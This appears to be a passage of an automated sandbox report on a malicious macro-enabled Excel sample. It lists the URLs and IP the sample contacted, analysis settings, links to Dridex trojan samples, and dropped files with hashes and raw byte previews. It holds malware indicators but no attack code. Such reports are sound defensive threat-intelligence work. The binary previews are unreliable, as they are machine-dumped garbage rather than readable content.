                                                                                                                                          https://augloop.office.com/v239636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drfalse
                                                                                                                                            high
                                                                                                                                            https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drfalse
                                                                                                                                              high
                                                                                                                                              https://skyapi.live.net/Activity/39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drfalse
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              unknown
                                                                                                                                              https://clients.config.office.net/user/v1.0/mac39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drfalse
                                                                                                                                                high
                                                                                                                                                https://dataservice.o365filtering.com39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drfalse
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                unknown
                                                                                                                                                https://api.cortana.ai39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drfalse
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                unknown
                                                                                                                                                https://onedrive.live.com39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drfalse
                                                                                                                                                  high
                                                                                                                                                  https://ovisualuiapp.azurewebsites.net/pbiagave/39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drfalse
                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                  unknown
                                                                                                                                                  https://visio.uservoice.com/forums/368202-visio-on-devices39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drfalse
                                                                                                                                                    high
                                                                                                                                                    https://directory.services.39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drfalse
                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                    unknown

                                                                                                                                                    Contacted IPs

                                                                                                                                                    • No. of IPs < 25%
                                                                                                                                                    • 25% < No. of IPs < 50%
                                                                                                                                                    • 50% < No. of IPs < 75%
                                                                                                                                                    • 75% < No. of IPs

                                                                                                                                                    Public

                                                                                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                    162.241.225.18
                                                                                                                                                    unknownUnited States
                                                                                                                                                    46606UNIFIEDLAYER-AS-1USfalse

                                                                                                                                                    Private

                                                                                                                                                    IP
                                                                                                                                                    192.168.2.1

                                                                                                                                                    General Information

                                                                                                                                                    Joe Sandbox Version:31.0.0 Red Diamond
                                                                                                                                                    Analysis ID:343133
                                                                                                                                                    Start date:22.01.2021
                                                                                                                                                    Start time:11:45:45
                                                                                                                                                    Joe Sandbox Product:CloudBasic
                                                                                                                                                    Overall analysis duration:0h 4m 16s
                                                                                                                                                    Hypervisor based Inspection enabled:false
                                                                                                                                                    Report type:full
                                                                                                                                                    Sample file name:request_form_1611306935.xlsm
                                                                                                                                                    Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                                    Run name:Potential for more IOCs and behavior
                                                                                                                                                    Number of analysed new started processes analysed:23
                                                                                                                                                    Number of new started drivers analysed:0
                                                                                                                                                    Number of existing processes analysed:0
                                                                                                                                                    Number of existing drivers analysed:0
                                                                                                                                                    Number of injected processes analysed:0
                                                                                                                                                    Technologies:
                                                                                                                                                    • HCA enabled
                                                                                                                                                    • EGA enabled
                                                                                                                                                    • HDC enabled
                                                                                                                                                    • AMSI enabled
                                                                                                                                                    Analysis Mode:default
                                                                                                                                                    Analysis stop reason:Timeout
                                                                                                                                                    Detection:MAL
                                                                                                                                                    Classification:mal64.expl.evad.winXLSM@2/12@1/2
                                                                                                                                                    Cookbook Comments:
                                                                                                                                                    • Adjust boot time
                                                                                                                                                    • Enable AMSI
                                                                                                                                                    • Found application associated with file extension: .xlsm
                                                                                                                                                    • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                                    • Attach to Office via COM
                                                                                                                                                    • Scroll down
                                                                                                                                                    • Close Viewer
                                                                                                                                                    Warnings:
                                                                                                                                                    Show All
                                                                                                                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                                                                                                                    • Excluded IPs from analysis (whitelisted): 168.61.161.212, 104.42.151.234, 52.109.88.177, 52.109.12.23, 51.11.168.160, 23.210.248.85, 92.122.213.247, 92.122.213.194, 20.54.26.129
                                                                                                                                                    • Excluded domains from analysis (whitelisted): prod-w.nexus.live.com.akadns.net, arc.msn.com.nsatc.net, fs.microsoft.com, prod.configsvc1.live.com.akadns.net, ris-prod.trafficmanager.net, skypedataprdcolcus17.cloudapp.net, e1723.g.akamaiedge.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, ris.api.iris.microsoft.com, config.officeapps.live.com, blobcollector.events.data.trafficmanager.net, nexus.officeapps.live.com, officeclient.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, skypedataprdcolwus16.cloudapp.net, europe.configsvc1.live.com.akadns.net
                                                                                                                                                    • VT rate limit hit for: /opt/package/joesandbox/database/analysis/343133/sample/request_form_1611306935.xlsm

                                                                                                                                                    Simulations

                                                                                                                                                    Behavior and APIs

                                                                                                                                                    No simulations

                                                                                                                                                    Joe Sandbox View / Context

                                                                                                                                                    IPs

                                                                                                                                                    No context

                                                                                                                                                    Domains

                                                                                                                                                    No context

                                                                                                                                                    ASN

                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                    UNIFIEDLAYER-AS-1USfile-2021-7_86628.docGet hashmaliciousBrowse
                                                                                                                                                    • 162.241.253.129
                                                                                                                                                    SecuriteInfo.com.Trojan.Dridex.735.31734.dllGet hashmaliciousBrowse
                                                                                                                                                    • 198.57.200.100
                                                                                                                                                    SecuriteInfo.com.Trojan.Dridex.735.12612.dllGet hashmaliciousBrowse
                                                                                                                                                    • 198.57.200.100
                                                                                                                                                    SecuriteInfo.com.Trojan.Dridex.735.4639.dllGet hashmaliciousBrowse
                                                                                                                                                    • 198.57.200.100
                                                                                                                                                    SecuriteInfo.com.Trojan.Dridex.735.24961.dllGet hashmaliciousBrowse
                                                                                                                                                    • 198.57.200.100
                                                                                                                                                    SecuriteInfo.com.Trojan.Dridex.735.6647.dllGet hashmaliciousBrowse
                                                                                                                                                    • 198.57.200.100
                                                                                                                                                    SecuriteInfo.com.Trojan.Dridex.735.4309.dllGet hashmaliciousBrowse
                                                                                                                                                    • 198.57.200.100
                                                                                                                                                    SecuriteInfo.com.Trojan.Dridex.735.30163.dllGet hashmaliciousBrowse
                                                                                                                                                    • 198.57.200.100
                                                                                                                                                    SecuriteInfo.com.Trojan.Dridex.735.17436.dllGet hashmaliciousBrowse
                                                                                                                                                    • 198.57.200.100
                                                                                                                                                    SecuriteInfo.com.Trojan.Dridex.735.15942.dllGet hashmaliciousBrowse
                                                                                                                                                    • 198.57.200.100
                                                                                                                                                    SecuriteInfo.com.Trojan.Dridex.735.27526.dllGet hashmaliciousBrowse
                                                                                                                                                    • 198.57.200.100
                                                                                                                                                    SecuriteInfo.com.Trojan.Dridex.735.71.dllGet hashmaliciousBrowse
                                                                                                                                                    • 198.57.200.100
                                                                                                                                                    SecuriteInfo.com.Trojan.Dridex.735.23113.dllGet hashmaliciousBrowse
                                                                                                                                                    • 198.57.200.100
                                                                                                                                                    SecuriteInfo.com.Trojan.Dridex.735.32551.dllGet hashmaliciousBrowse
                                                                                                                                                    • 198.57.200.100
                                                                                                                                                    SecuriteInfo.com.Trojan.Dridex.735.1019.dllGet hashmaliciousBrowse
                                                                                                                                                    • 198.57.200.100
                                                                                                                                                    SecuriteInfo.com.Trojan.Dridex.735.3229.dllGet hashmaliciousBrowse
                                                                                                                                                    • 198.57.200.100
                                                                                                                                                    SecuriteInfo.com.Trojan.Dridex.735.24817.dllGet hashmaliciousBrowse
                                                                                                                                                    • 198.57.200.100
                                                                                                                                                    SecuriteInfo.com.Trojan.Dridex.735.27326.dllGet hashmaliciousBrowse
                                                                                                                                                    • 198.57.200.100
                                                                                                                                                    SecuriteInfo.com.Trojan.Dridex.735.2669.dllGet hashmaliciousBrowse
                                                                                                                                                    • 198.57.200.100
                                                                                                                                                    SecuriteInfo.com.Generic.mg.f90bda9159b6e075.dllGet hashmaliciousBrowse
                                                                                                                                                    • 198.57.200.100

                                                                                                                                                    JA3 Fingerprints

                                                                                                                                                    No context

                                                                                                                                                    Dropped Files

                                                                                                                                                    No context

                                                                                                                                                    Created / dropped Files

                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                    File Type:XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):132942
                                                                                                                                                    Entropy (8bit):5.372898345467023
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:1536:wcQceNgaBtA3gZw+pQ9DQW+zAUH34ZldpKWXboOilXPErLL8Eh:WrQ9DQW+zBX8P
                                                                                                                                                    MD5:9E81AE6834204F1603D85DB0F2715445
                                                                                                                                                    SHA1:0AAFB5D472B443DFF15C924BB333D312FE8DA476
                                                                                                                                                    SHA-256:882A40C2C8A9835D2BA318020A8DFFAB7A5970CFB8457CB9D0BE9C18C58F01B8
                                                                                                                                                    SHA-512:0A76B9FD31BEBA4C0B1620C32BED2A5F8D4A2E1FC9A4015131874BEB6D0A2D57E7BBBE716FA1CB724E59A24AE919B0EBE06BB09BF16BF32F07CBBA6CE0CF211C
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    Preview: <?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2021-01-22T10:46:40">.. Build: 16.0.13720.30526-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:
                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\211C0159.png
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                    File Type:PNG image data, 30 x 30, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):1028
                                                                                                                                                    Entropy (8bit):7.761039651897249
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:24:OZYvitHj0T5rwDxmsYnNk56uCnIw2+ujc:O6vitHQT5rvn1ud+uA
                                                                                                                                                    MD5:600F503BC1066BEB5FB5DD494AA1CD74
                                                                                                                                                    SHA1:A504D5E687B98F9E0FD2896DFC8492DE0F974BE6
                                                                                                                                                    SHA-256:B06BA2FAAAF371AE2F92D9047FFDAAF1933E03CFBC1E999E8B7CF378E33499C3
                                                                                                                                                    SHA-512:B7D40CDCD4F442E8941947AF64343D8A06CA8C9710E74BE8E00245C5A67DF574ED243D2B988814843C0AD9483D7058EC355CE087665FFDA5C484CBDF8FD40E40
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    Preview: .PNG........IHDR..............R9.....sRGB.........pHYs...t...t..f.x....IDATHK..YL.Q......Vl.P. .qC.(....(.".-..q....%1.q./F.Q.L\./4.KlX.Q...EE..(. ..V.i;.z...h..7.0........(...|s.k.J.Mm].J|.3........W.&EE..s.hS.}.....%^x`s....s..Rb..9....jw...o.e..17=:!&..X.Q._.!. |....N$.L.1.N..}.k..v..2.piZ..A.,.l.w......I.{...p...C[......'.........b....:f.\?!3MK........Cb..B.....%`?1..Y>9\....P.......z..uK...g.V.P.U.3...L.j.?(.g.....}.=.}......L.B.{...i.!..-q....9(=%^......&.q.j..>.q...w.NO.@.D..jmnL...U.R0B=6...U....P}Koh.D@"...]9...r,. .."2.......[.~ .......... .ay....nCm'...(..$......_4....*gNT..02h...zT.b.hhF..E.l.Z..J8.....=..H.{....Q...hg.g...u_!...T7./..+...u.....m...C]..E-..ki.CS..2.V..v>.?..$d..U.o.o...w........."....7..g...O]...U`..........g..A.j.....b...\.s(I.......@._B....i..2.I..7W.6....`..!r].P.......^.8n ..X...+3...F.....!x...H..fkYu....y.l...(../.y....,;~qV.R!#C.q...yoE..{O:...R.......c...Z;..[.x.....#N...'....M..@...n0..nD..!..p.!J....
                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\980348B8.png
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                    File Type:PNG image data, 30 x 30, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):677
                                                                                                                                                    Entropy (8bit):7.433026174405032
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:12:6v/7RllfMXWaBlhV/Jk6gGPRRKyiaWH/LpR5PTQ6//blm1X+fZ8w5s7nP9Np971x:OZYZnDqkZiaOtnEuA1X+a0sL1L9cLUa6
                                                                                                                                                    MD5:55E8A29B221E51BE421B7D4F5F5F7E52
                                                                                                                                                    SHA1:117E73181FC9CDAA0904C6372D68EE48CEDC14E4
                                                                                                                                                    SHA-256:B54D8571DB2F8FC570144F24EF7A42CE93FAB269AF166BF1234DBD2F96D86EB8
                                                                                                                                                    SHA-512:8592A133D815BBC225336F9149A4C89244CBCDEACC958470126DCD266DA8590C587D50D56A7F70771568C4D015BF55642DAAD6434F1C47E8BBBC4AB691694654
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    Preview: .PNG........IHDR..............R9.....sRGB.........pHYs...t...t..f.x...JIDATHKc...?...g..l.;k...FF...@H..jb`d..?-P'.SYA......f.........'.?............{K.a..:..W..s.~.....{.....<.....9.......[.=\{.._FN^._{'{3VM?.p..v._....v..;..s...O.....*.|........yaz....!/...........o..xZ.Sn...O+YP.122.....33.A..3.?.DR...+.F...o.M_..h.W...}..K?.........*....z..K...........F?..{............|..`!l*X...E.....$.......3... ..0....+.r.D.D7e.&.b...t...../..o.I2.p...yl.J|.Y0j4Z....!.s#;.XW.gbd`.bb........X..ue...'fi..[1..!.@.......s.:(..e`}.. ...-...1.. J..(`..,}.X...H.>".m?..h .X.D.5Ff......y"4.P.4d...@.A..8.[?..7q....I.*.M..[.>\{....j..Y3...3.5'......op.....IEND.B`.
                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\A3196997.png
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                    File Type:PNG image data, 30 x 30, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):677
                                                                                                                                                    Entropy (8bit):7.433026174405032
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:12:6v/7RllfMXWaBlhV/Jk6gGPRRKyiaWH/LpR5PTQ6//blm1X+fZ8w5s7nP9Np971x:OZYZnDqkZiaOtnEuA1X+a0sL1L9cLUa6
                                                                                                                                                    MD5:55E8A29B221E51BE421B7D4F5F5F7E52
                                                                                                                                                    SHA1:117E73181FC9CDAA0904C6372D68EE48CEDC14E4
                                                                                                                                                    SHA-256:B54D8571DB2F8FC570144F24EF7A42CE93FAB269AF166BF1234DBD2F96D86EB8
                                                                                                                                                    SHA-512:8592A133D815BBC225336F9149A4C89244CBCDEACC958470126DCD266DA8590C587D50D56A7F70771568C4D015BF55642DAAD6434F1C47E8BBBC4AB691694654
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    Preview: .PNG........IHDR..............R9.....sRGB.........pHYs...t...t..f.x...JIDATHKc...?...g..l.;k...FF...@H..jb`d..?-P'.SYA......f.........'.?............{K.a..:..W..s.~.....{.....<.....9.......[.=\{.._FN^._{'{3VM?.p..v._....v..;..s...O.....*.|........yaz....!/...........o..xZ.Sn...O+YP.122.....33.A..3.?.DR...+.F...o.M_..h.W...}..K?.........*....z..K...........F?..{............|..`!l*X...E.....$.......3... ..0....+.r.D.D7e.&.b...t...../..o.I2.p...yl.J|.Y0j4Z....!.s#;.XW.gbd`.bb........X..ue...'fi..[1..!.@.......s.:(..e`}.. ...-...1.. J..(`..,}.X...H.>".m?..h .X.D.5Ff......y"4.P.4d...@.A..8.[?..7q....I.*.M..[.>\{....j..Y3...3.5'......op.....IEND.B`.
                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\B81B86AC.png
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                    File Type:PNG image data, 30 x 30, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):1028
                                                                                                                                                    Entropy (8bit):7.761039651897249
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:24:OZYvitHj0T5rwDxmsYnNk56uCnIw2+ujc:O6vitHQT5rvn1ud+uA
                                                                                                                                                    MD5:600F503BC1066BEB5FB5DD494AA1CD74
                                                                                                                                                    SHA1:A504D5E687B98F9E0FD2896DFC8492DE0F974BE6
                                                                                                                                                    SHA-256:B06BA2FAAAF371AE2F92D9047FFDAAF1933E03CFBC1E999E8B7CF378E33499C3
                                                                                                                                                    SHA-512:B7D40CDCD4F442E8941947AF64343D8A06CA8C9710E74BE8E00245C5A67DF574ED243D2B988814843C0AD9483D7058EC355CE087665FFDA5C484CBDF8FD40E40
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    Preview: .PNG........IHDR..............R9.....sRGB.........pHYs...t...t..f.x....IDATHK..YL.Q......Vl.P. .qC.(....(.".-..q....%1.q./F.Q.L\./4.KlX.Q...EE..(. ..V.i;.z...h..7.0........(...|s.k.J.Mm].J|.3........W.&EE..s.hS.}.....%^x`s....s..Rb..9....jw...o.e..17=:!&..X.Q._.!. |....N$.L.1.N..}.k..v..2.piZ..A.,.l.w......I.{...p...C[......'.........b....:f.\?!3MK........Cb..B.....%`?1..Y>9\....P.......z..uK...g.V.P.U.3...L.j.?(.g.....}.=.}......L.B.{...i.!..-q....9(=%^......&.q.j..>.q...w.NO.@.D..jmnL...U.R0B=6...U....P}Koh.D@"...]9...r,. .."2.......[.~ .......... .ay....nCm'...(..$......_4....*gNT..02h...zT.b.hhF..E.l.Z..J8.....=..H.{....Q...hg.g...u_!...T7./..+...u.....m...C]..E-..ki.CS..2.V..v>.?..$d..U.o.o...w........."....7..g...O]...U`..........g..A.j.....b...\.s(I.......@._B....i..2.I..7W.6....`..!r].P.......^.8n ..X...+3...F.....!x...H..fkYu....y.l...(../.y....,;~qV.R!#C.q...yoE..{O:...R.......c...Z;..[.x.....#N...'....M..@...n0..nD..!..p.!J....
                                                                                                                                                    C:\Users\user\AppData\Local\Temp\84910000
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):16999
                                                                                                                                                    Entropy (8bit):7.245623688499512
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:192:LYUGo7Hs+KmIqbuGwTLHd8TS9/P2iponEKUAVi+mEqM6AH2HyFUt:LY/ks/hTLHdV9uiMEKk+RqNueh
                                                                                                                                                    MD5:17A33B944AE3D430755B936573D29D81
                                                                                                                                                    SHA1:4F857FFA6B96040D1A599282395C9B235CED47D2
                                                                                                                                                    SHA-256:EABF400B7FFF9E0E3826E21CE1B6C0B27A2AA691433828D4929DB86BAD2B5D95
                                                                                                                                                    SHA-512:8E6B06B37D1847FFCCD55057B136A2C0DA6C03FE58B62BAB0A9BBCFF4DC89A09AE2399488C8FDDBA907D24260227BA3DD8921547C54EB9C7D11CB308E8192FFC
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    Preview: .U.n.0....?..........C....I?.&..an.L...;..............pz..y..6.^\t..@...0....M.E4H*..b.^........:.6\...#Q.*%.....&.<...+..<..R. /'..R.@....!f..P......o..m...w...*%g.".*..yE....j0Q?z..0eP.G..K.2c.."6.B..Lax.i}.\..Wdpx..m..WV+8..8.7....9l.~..fk..S.n..........a.....V.\W...9^.5w.s.....j%.z........W.T.#:..S....>.....K..@....W.#.....n@.1.*..'...........s. .....:..]....83...K.).mb .da.u....#w...J[7`.p.z..~.......PK..........!.................[Content_Types].xml ...(....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Thu Jun 27 16:19:49 2019, mtime=Fri Jan 22 18:46:43 2021, atime=Fri Jan 22 18:46:43 2021, length=8192, window=hide
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):904
                                                                                                                                                    Entropy (8bit):4.649128754247888
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:12:8NCXUkpuElPCH2A5PbMpn0Q+WrjAZ/2bD0lTLC5Lu4t2Y+xIBjKZm:8NbFbMWqAZiDZ87aB6m
                                                                                                                                                    MD5:05AD3606B833EAA097DF939096EE6EA0
                                                                                                                                                    SHA1:A5EFA39CD586BF3659178FAEF3EC042199E71967
                                                                                                                                                    SHA-256:6685163881E61FFAB7DEDF34436D05DCA15E3C1187706627ED027F12084F729B
                                                                                                                                                    SHA-512:61AC7C66C306C4630C5AC1DF27AF32D9B6984A2695351496F96FCE666E170096B2665D1401B9E568554CD57F3574E796CD9523890119D56A00A69C392002AD05
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    Preview: L..................F........N....-....;O....@./O..... ......................u....P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L..6R.....................:.....q|..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....P.1.....>Qwx..user.<.......Ny.6R......S........................h.a.r.d.z.....~.1.....6R...Desktop.h.......Ny.6R......Y..............>.....|...D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......E...............-.......D...........>.S......C:\Users\user\Desktop........\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...As...`.......X.......724536...........!a..%.H.VZAj...4.4...........-..!a..%.H.VZAj...4.4...........-.............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2.0.9.-.4.0.5.3.0.6.2.3.3.2.-.1.0.0.2.........9...1SPS..mD..pH.H@..=x.....h....H......K*..@.A..7sFJ............
                                                                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                    Category:modified
                                                                                                                                                    Size (bytes):299
                                                                                                                                                    Entropy (8bit):4.757013773544315
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:6:djYOWJcWapmHWJcWapmOWJcWapmHWJcWapmOWJcWapmHWJcWapmOWJcWapc:dMOWlapmHWlapmOWlapmHWlapmOWlap5
                                                                                                                                                    MD5:3C08FBB167AAFDACB0B5E3B1F6A3D53A
                                                                                                                                                    SHA1:C8FCEE10CE6CF142E9D8974C414CA8E6573F193A
                                                                                                                                                    SHA-256:9BEA52E05C051EF5969E66129F5F2E0D2641E85F12BC502BF266B409471C000B
                                                                                                                                                    SHA-512:617CE063F07333C514EB4A3109F0283D23C5115AFCF6315D24DB67949937606AA6119E4D851098BFDEF551F39DFFE7F9A4986905FF6BD81750C07939DC82C0EB
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    Preview: Desktop.LNK=0..[misc]..request_form_1611306935.xlsm.LNK=0..request_form_1611306935.xlsm.LNK=0..[misc]..request_form_1611306935.xlsm.LNK=0..request_form_1611306935.xlsm.LNK=0..[misc]..request_form_1611306935.xlsm.LNK=0..request_form_1611306935.xlsm.LNK=0..[misc]..request_form_1611306935.xlsm.LNK=0..
                                                                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\request_form_1611306935.xlsm.LNK
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Sep 30 14:03:42 2020, mtime=Fri Jan 22 18:46:43 2021, atime=Fri Jan 22 18:46:42 2021, length=16999, window=hide
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):4500
                                                                                                                                                    Entropy (8bit):4.702877924238364
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:48:84vZ6Dwko6spB6p4vZ6Dwko6spB6pavZ6Dwko6spB6pavZ6Dwko6spB6:8BHspKBHspKTHspKTHsp
                                                                                                                                                    MD5:A9A64A3AB585A26CD43F18B24CCDF015
                                                                                                                                                    SHA1:4B3E85A65E716D45C9686C7A8D70F2AFDB515E78
                                                                                                                                                    SHA-256:A57711BB2548B645E1EBD353E09FB76227117ED79D5170E9C254C18A61D2AE3F
                                                                                                                                                    SHA-512:64E645F1A498B10DEF3CBD450AA66DAF0344115D521E33DB6F47F183F0DEB3FE9AA5EA6EE7FDF084706D9173B46CEAFE6B59AE18538D13FD1A0F64FB6EE60485
                                                                                                                                                    Malicious:true
                                                                                                                                                    Reputation:low
                                                                                                                                                    Preview: L..................F.... ...`...:...@./O.....@-O....gB...........................P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L..6R.....................:.....q|..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....P.1.....>Qwx..user.<.......Ny.6R......S........................h.a.r.d.z.....~.1.....>Qxx..Desktop.h.......Ny.6R......Y..............>......8..D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2..B..6R. .REQUES~1.XLS..j......>Qvx6R.....h.........................r.e.q.u.e.s.t._.f.o.r.m._.1.6.1.1.3.0.6.9.3.5...x.l.s.m.......b...............-.......a...........>.S......C:\Users\user\Desktop\request_form_1611306935.xlsm..3.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.r.e.q.u.e.s.t._.f.o.r.m._.1.6.1.1.3.0.6.9.3.5...x.l.s.m.........:..,.LB.)...As...`.......X.......724536...........!a..%.H.VZAj......-.........-..!a..%.H.VZAj......-.........-.............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.
                                                                                                                                                    C:\Users\user\Desktop\75910000
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):16999
                                                                                                                                                    Entropy (8bit):7.245623688499512
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:192:LYUGo7Hs+KmIqbuGwTLHd8TS9/P2iponEKUAVi+mEqM6AH2HyFUt:LY/ks/hTLHdV9uiMEKk+RqNueh
                                                                                                                                                    MD5:17A33B944AE3D430755B936573D29D81
                                                                                                                                                    SHA1:4F857FFA6B96040D1A599282395C9B235CED47D2
                                                                                                                                                    SHA-256:EABF400B7FFF9E0E3826E21CE1B6C0B27A2AA691433828D4929DB86BAD2B5D95
                                                                                                                                                    SHA-512:8E6B06B37D1847FFCCD55057B136A2C0DA6C03FE58B62BAB0A9BBCFF4DC89A09AE2399488C8FDDBA907D24260227BA3DD8921547C54EB9C7D11CB308E8192FFC
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
